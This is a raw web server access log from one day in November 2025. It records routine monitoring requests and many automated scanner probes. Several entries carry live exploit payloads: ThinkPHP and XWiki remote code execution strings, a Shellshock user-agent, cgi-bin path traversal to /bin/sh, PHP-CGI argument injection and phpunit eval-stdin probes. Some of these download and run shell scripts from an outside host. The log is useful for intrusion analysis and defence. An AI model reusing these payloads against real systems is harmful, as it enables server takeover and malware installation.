3.145.49.236 - - [07/Nov/2025:16:23:33 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.219 - - [07/Nov/2025:16:24:12 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.212 - - [07/Nov/2025:16:28:00 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.146.107.169 - - [07/Nov/2025:16:29:49 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:16:29:49 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
184.105.247.196 - - [07/Nov/2025:16:32:14 +0300] "\x16\x03\x01" 400 325 "-" "-"
34.247.51.117 - - [07/Nov/2025:16:32:27 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
34.247.51.117 - - [07/Nov/2025:16:32:27 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:16:33:44 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:16:33:44 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:16:39:24 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:16:39:24 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
45.151.139.254 - - [07/Nov/2025:16:42:19 +0300] "GET / HTTP/1.1" 302 - "-" "-"
45.151.139.254 - - [07/Nov/2025:16:42:19 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "-" "-"
193.142.147.209 - - [07/Nov/2025:16:43:13 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 299
3.146.107.169 - - [07/Nov/2025:16:49:20 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:16:49:21 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:16:53:35 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:16:53:36 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:16:59:22 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:16:59:23 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:17:04:59 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:17:05:00 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
162.62.231.139 - - [07/Nov/2025:17:15:22 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
162.62.231.139 - - [07/Nov/2025:17:15:22 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
3.145.49.236 - - [07/Nov/2025:17:15:30 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:17:15:30 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
213.209.157.24 - - [07/Nov/2025:17:21:29 +0300] "GET /.git/config HTTP/1.1" 404 299
3.145.49.236 - - [07/Nov/2025:17:24:30 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:17:24:30 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:17:25:33 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:17:25:34 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
82.165.93.36 - - [07/Nov/2025:17:27:08 +0300] "GET /webclient/ HTTP/1.1" 404 299
216.180.246.47 - - [07/Nov/2025:17:36:27 +0300] "GET / HTTP/1.0" 302 119 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.47 - - [07/Nov/2025:17:36:39 +0300] "\x16\x03\x01" 400 325 "-" "-"
44.201.177.43 - - [07/Nov/2025:17:36:55 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:17:36:55 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
216.180.246.47 - - [07/Nov/2025:17:37:15 +0300] "GET / HTTP/1.1" 302 - "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
139.99.35.41 - - [07/Nov/2025:17:37:33 +0300] "GET / HTTP/1.1" 302 -
216.180.246.47 - - [07/Nov/2025:17:37:58 +0300] "GET /manage/account/login HTTP/1.1" 404 298 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.47 - - [07/Nov/2025:17:38:20 +0300] "GET /admin/index.html HTTP/1.1" 404 298 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.47 - - [07/Nov/2025:17:38:48 +0300] "GET /index.html HTTP/1.1" 404 298 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.47 - - [07/Nov/2025:17:39:25 +0300] "GET /+CSCOE+/logon.html HTTP/1.1" 404 298 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.47 - - [07/Nov/2025:17:39:53 +0300] "GET /cgi-bin/login.cgi HTTP/1.1" 404 298 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.47 - - [07/Nov/2025:17:40:20 +0300] "GET /login.htm HTTP/1.1" 404 298 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.47 - - [07/Nov/2025:17:40:48 +0300] "GET /login.html HTTP/1.1" 404 298 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.47 - - [07/Nov/2025:17:41:17 +0300] "GET /login.jsp HTTP/1.1" 404 298 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
93.174.93.12 - - [07/Nov/2025:17:41:27 +0300] "GET / HTTP/1.0" 302 119 "-" "Mozilla/5.0 (Linux; Android 9; MHA-AL00 Build/HUAWEIMHA-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.99 Mobile Safari/537.36 MMWEBID/9772 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN"
216.180.246.47 - - [07/Nov/2025:17:41:44 +0300] "GET /login HTTP/1.1" 404 298 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.47 - - [07/Nov/2025:17:42:16 +0300] "GET /doc/index.html HTTP/1.1" 404 298 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.47 - - [07/Nov/2025:17:42:45 +0300] "GET /remote/login HTTP/1.1" 404 298 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.47 - - [07/Nov/2025:17:43:04 +0300] "GET //admin/login.asp HTTP/1.1" 404 298 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.47 - - [07/Nov/2025:17:43:34 +0300] "GET /web/ HTTP/1.1" 404 298 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
3.145.49.236 - - [07/Nov/2025:17:43:56 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:17:43:56 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
216.180.246.47 - - [07/Nov/2025:17:44:02 +0300] "GET //webpages/login.html HTTP/1.1" 404 298 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
3.146.107.169 - - [07/Nov/2025:17:45:13 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:17:45:14 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
139.99.35.36 - - [07/Nov/2025:17:46:22 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
3.145.49.236 - - [07/Nov/2025:17:50:07 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:17:50:08 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:17:51:56 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:17:51:57 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:18:01:49 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:18:01:49 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:18:08:42 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:18:08:43 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:18:19:00 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:18:19:01 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.219 - - [07/Nov/2025:18:22:21 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
44.201.177.43 - - [07/Nov/2025:18:28:02 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:18:28:02 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
176.65.149.253 - - [07/Nov/2025:18:29:54 +0300] "GET /.env HTTP/1.0" 404 299
3.145.49.236 - - [07/Nov/2025:18:48:13 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:18:48:14 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
34.247.51.117 - - [07/Nov/2025:18:50:45 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
34.247.51.117 - - [07/Nov/2025:18:50:46 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
51.254.49.110 - - [07/Nov/2025:18:51:12 +0300] "GET / HTTP/1.1" 302 -
44.201.177.43 - - [07/Nov/2025:18:53:51 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:18:53:51 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:19:01:27 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:19:01:28 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
80.82.70.133 - - [07/Nov/2025:19:02:21 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/533.33.2 (KHTML, like Gecko) Version/4.0 Safari/533.33.2"
80.82.70.133 - - [07/Nov/2025:19:02:21 +0300] "GET /phpinfo.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 Mozilla/5.0 (Windows NT 6.0; rv:31.0) Gecko/20160118 Firefox/31.0"
80.82.70.133 - - [07/Nov/2025:19:02:21 +0300] "GET /index.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
80.82.70.133 - - [07/Nov/2025:19:02:21 +0300] "GET /test.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/3.0)"
80.82.70.133 - - [07/Nov/2025:19:02:22 +0300] "GET /1.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/533.44.6 (KHTML, like Gecko) Version/4.0 Safari/533.44.6"
80.82.70.133 - - [07/Nov/2025:19:02:23 +0300] "GET /2.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/3.0)"
80.82.70.133 - - [07/Nov/2025:19:02:23 +0300] "GET /3.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/534.24.1 (KHTML, like Gecko) Version/4.0 Safari/534.24.1"
185.180.140.107 - - [07/Nov/2025:19:16:03 +0300] "GET /OA_HTML/AppsLocalLogin.jsp HTTP/1.1" 404 299
43.130.3.122 - - [07/Nov/2025:19:18:18 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.3.122 - - [07/Nov/2025:19:18:18 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
3.145.49.236 - - [07/Nov/2025:19:26:05 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:19:26:06 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
51.158.54.10 - - [07/Nov/2025:19:26:45 +0300] "GET /admin/config.php HTTP/1.0" 404 294
51.158.54.10 - - [07/Nov/2025:19:32:46 +0300] "GET /admin/config.php HTTP/1.0" 404 298 "-" "xfa1"
51.158.54.10 - - [07/Nov/2025:19:37:23 +0300] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0"
51.158.54.10 - - [07/Nov/2025:19:37:23 +0300] "GET /robots.txt HTTP/1.1" 404 299
18.116.51.177 - - [07/Nov/2025:19:38:46 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
18.116.51.177 - - [07/Nov/2025:19:38:47 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:19:40:44 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:19:40:45 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.26.115.195 - - [07/Nov/2025:19:42:44 +0300] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:19:42:44 +0300] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 302 - "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:19:42:44 +0300] "GET /public/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 404 298 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:19:42:45 +0300] "POST /index.php?s=captcha HTTP/1.1" 302 - "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:19:42:45 +0300] "POST /cgi-bin/login.cgi HTTP/1.0" 404 298 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:19:42:45 +0300] "GET / HTTP/1.1" 302 - "-" "() { :; }; /bin/bash -c \"(wget -qO- http://74.194.191.52/rondo.qre.sh||busybox wget -qO- http://74.194.191.52/rondo.qre.sh||curl -s http://74.194.191.52/rondo.qre.sh)|sh\"& # bang2013@atomicmail.io"
193.26.115.195 - - [07/Nov/2025:19:42:45 +0300] "POST /cgi-bin/cgi_main.cgi HTTP/1.1" 404 298 "http://91.132.49.59/cfg_system_time.htm" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:19:42:45 +0300] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 298 "http://91.132.49.59/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:19:42:46 +0300] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 400 328 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:19:42:46 +0300] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 298 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
193.26.115.195 - - [07/Nov/2025:19:42:46 +0300] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 298 "-" "Mozilla/5.0 (bang2013@atomicmail.io)"
204.76.203.212 - - [07/Nov/2025:19:46:59 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
20.65.193.168 - - [07/Nov/2025:19:47:00 +0300] "GET /owa/auth/x.js HTTP/1.1" 404 299
3.145.49.236 - - [07/Nov/2025:19:48:15 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:19:48:15 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:19:50:20 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:19:50:20 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
178.249.211.89 - - [07/Nov/2025:19:51:49 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (SS; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
178.249.211.89 - - [07/Nov/2025:19:51:49 +0300] "GET / HTTP/1.1" 302 -
44.201.177.43 - - [07/Nov/2025:19:56:52 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:19:57:48 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:19:57:48 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
20.65.195.58 - - [07/Nov/2025:19:57:49 +0300] "GET / HTTP/1.0" 400 468
3.145.49.236 - - [07/Nov/2025:20:12:57 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:20:12:58 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:20:13:33 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:20:13:33 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:20:24:25 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:20:24:26 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.219 - - [07/Nov/2025:20:24:59 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.142.147.209 - - [07/Nov/2025:20:26:51 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
212.227.3.26 - - [07/Nov/2025:20:35:54 +0300] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 328 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:55 +0300] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 328 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:56 +0300] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:56 +0300] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 302 - "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:56 +0300] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 302 - "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:56 +0300] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:56 +0300] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:56 +0300] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:56 +0300] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:56 +0300] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:56 +0300] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:56 +0300] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:57 +0300] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:57 +0300] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:57 +0300] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:57 +0300] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:57 +0300] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:57 +0300] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:58 +0300] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:58 +0300] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:58 +0300] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:58 +0300] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:58 +0300] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:58 +0300] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:59 +0300] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:59 +0300] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:59 +0300] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:59 +0300] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:59 +0300] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:59 +0300] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:59 +0300] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
212.227.3.26 - - [07/Nov/2025:20:35:59 +0300] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 298 "-" "libredtail-http"
